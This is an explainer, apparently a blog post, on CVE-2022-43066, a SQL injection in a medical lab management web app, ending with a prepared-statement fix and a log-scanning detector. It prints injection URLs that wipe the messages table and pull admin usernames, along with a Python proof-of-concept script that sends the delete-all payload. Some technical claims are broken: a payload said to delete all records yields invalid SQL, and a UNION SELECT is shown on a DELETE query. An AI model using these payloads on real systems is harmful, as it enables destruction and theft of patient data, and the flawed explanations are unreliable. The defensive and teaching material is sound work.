Overview
In late 2022, a critical vulnerability was discovered in the Online Diagnostic Lab Management System v1. (ODLMS), a web app used by medical labs to manage patient records, test bookings, and reports. The flaw, recorded as CVE-2022-43066, allows attackers to perform SQL injection through the id parameter of the endpoint /odlms/classes/Master.php?f=delete_message. Using this vulnerability, an attacker could manipulate the backend database, extract sensitive data, or even take over the system.
Let's break down what this vulnerability is, why it matters, and how it can be exploited, with practical code examples, simple explanations, and links to official advisory sources.
What Is CVE-2022-43066?
CVE-2022-43066 is a SQL injection vulnerability. This happens when user inputs in a web application are directly inserted into SQL queries without proper validation/sanitization, letting an attacker interfere with the backend database. In ODLMS v1., the flaw sits in the way the app processes the id parameter in message deletion requests.
Vulnerable URL
/odlms/classes/Master.php?f=delete_message&id=123
By tricking the app with crafted values instead of plain numbers for id, an attacker can run their own SQL commands.
Why Is This Dangerous?
- Data Theft: Attackers can download or modify all patient records, including names, medical details, and more.
Here's a typical (simplified) vulnerable PHP code snippet that demonstrates the problem:
<?php
// This code is for explanation - actual code may differ
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    // The raw request value is spliced straight into the SQL text: this is the bug
    $sql = "DELETE FROM messages WHERE id = $id";
    $result = mysqli_query($conn, $sql);
}
?>
Notice how $id goes *directly* into the SQL statement. If an attacker supplies id=1 OR 1=1, the query becomes:
DELETE FROM messages WHERE id = 1 OR 1=1
This would delete all messages because 1=1 is always true.
1. Testing for Vulnerability
Using a tool like Burp Suite or even just a web browser, an attacker can test the following URL:
http://example.com/odlms/classes/Master.php?f=delete_message&id=1 OR 1=1
If all messages are deleted (or a SQL error shows up), the app is likely vulnerable.
2. Extracting Data
Attackers can leverage the SQL injection to dump sensitive data by union-based injection or error-based injection, depending on database responses.
The following payload attempts to view admin usernames (assuming the query returns two columns):
http://example.com/odlms/classes/Master.php?f=delete_message&id=1 UNION SELECT 1,username FROM admins--
If the page shows usernames or weird output, you've confirmed injection.
To wipe the entire messages table:
http://example.com/odlms/classes/Master.php?f=delete_message&id= OR 1=1
This would trigger:
DELETE FROM messages WHERE id = OR 1=1
Result: All records in the messages table are deleted.
Simple Proof-of-Concept (PoC) Code
Here's a Python script using requests to automate the attack:
import requests

url = "http://example.com/odlms/classes/Master.php"
params = {
    "f": "delete_message",
    "id": "1 OR 1=1"  # SQL Injection payload
}
response = requests.get(url, params=params)
if response.status_code == 200:
    print("Check if all messages are deleted (SQLi succeeded).")
else:
    print("Request failed.")
Responsible Disclosure and Protection
The vulnerability was responsibly reported and is logged at NVD - CVE-2022-43066 and in the Exploit Database.
Securing the PHP snippet
$id = $_GET['id'];
// Prepared statement: the SQL text is fixed and the value travels separately as a parameter
$stmt = $conn->prepare("DELETE FROM messages WHERE id = ?");
$stmt->bind_param("i", $id); // "i" binds the value as an integer, so "1 OR 1=1" can never reach the query
$stmt->execute();
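On the detection side, here is an added example (not code from the original article or from the ODLMS project) that scans web-server access-log lines for calls to the delete_message endpoint whose id is anything other than a plain integer, which is exactly the set of values the bind_param("i") fix above would accept. The log lines and IP addresses are constructed for the demo; it also handles a request line that carries an unencoded space.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Nov/2022:20:15:01 +0000] "GET /odlms/classes/Master.php?f=delete_message&id=17 HTTP/1.1" 200 12
10.0.0.9 - - [02/Nov/2022:20:15:07 +0000] "GET /odlms/classes/Master.php?f=delete_message&id=1%20OR%201%3D1 HTTP/1.1" 200 12
10.0.0.9 - - [02/Nov/2022:20:15:09 +0000] "GET /odlms/classes/Master.php?f=delete_message&id=1+UNION+SELECT+1,username+FROM+admins-- HTTP/1.1" 200 340
10.0.0.9 - - [02/Nov/2022:20:15:11 +0000] "GET /odlms/classes/Master.php?f=delete_message&id=1 OR 1=1 HTTP/1.1" 200 12
10.0.0.5 - - [02/Nov/2022:20:15:12 +0000] "GET /odlms/classes/Master.php?f=get_message&id=17 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+$'
)
INT_RE = re.compile(r"-?\d+")


def suspicious_delete_message(line):
    """Return a finding for a delete_message request whose id is not a plain
    integer, else None. parse_qs decodes %xx and '+' once, as PHP's $_GET does."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Request line is "METHOD target HTTP/x.y". The target itself may contain raw
    # spaces when a client sent an unencoded payload, so peel off only the ends.
    request = re.sub(r" HTTP/\d\.\d$", "", m.group("request"))
    _method, _, target = request.partition(" ")
    parts = urlsplit(target)
    if not parts.path.endswith("/odlms/classes/Master.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("f") != ["delete_message"]:
        return None
    for raw_id in qs.get("id", [""]):
        # The patched code binds id with type "i", so a legitimate client only
        # ever sends digits; anything else is an injection attempt or a probe.
        if not INT_RE.fullmatch(raw_id):
            return {"ip": m.group("ip"), "time": m.group("ts"), "id": raw_id}
    return None


def scan(log_text):
    """Run the check over every line and return the list of findings."""
    return [f for f in map(suspicious_delete_message, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} id={finding['id']!r}")
```

The same check can run as a WAF rule or in a SIEM query; the point is that after the fix the only valid id values are integers, so everything else is worth an alert.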
References
- NVD Entry for CVE-2022-43066
- Exploit-DB 51118
- Sourcecodester Project Page
Final Thoughts
Even simple web apps in sensitive industries can have critical bugs like CVE-2022-43066. Healthcare providers using open-source management platforms must prioritize regular security audits, keep their software patched, and use secure coding practices. If you manage any PHP/MySQL platforms, make sure you're not trusting any user input directly—or you might be the next entry in the CVE list.
Timeline
Published on: 11/02/2022 20:15:00 UTC
Last modified on: 11/03/2022 03:35:00 UTC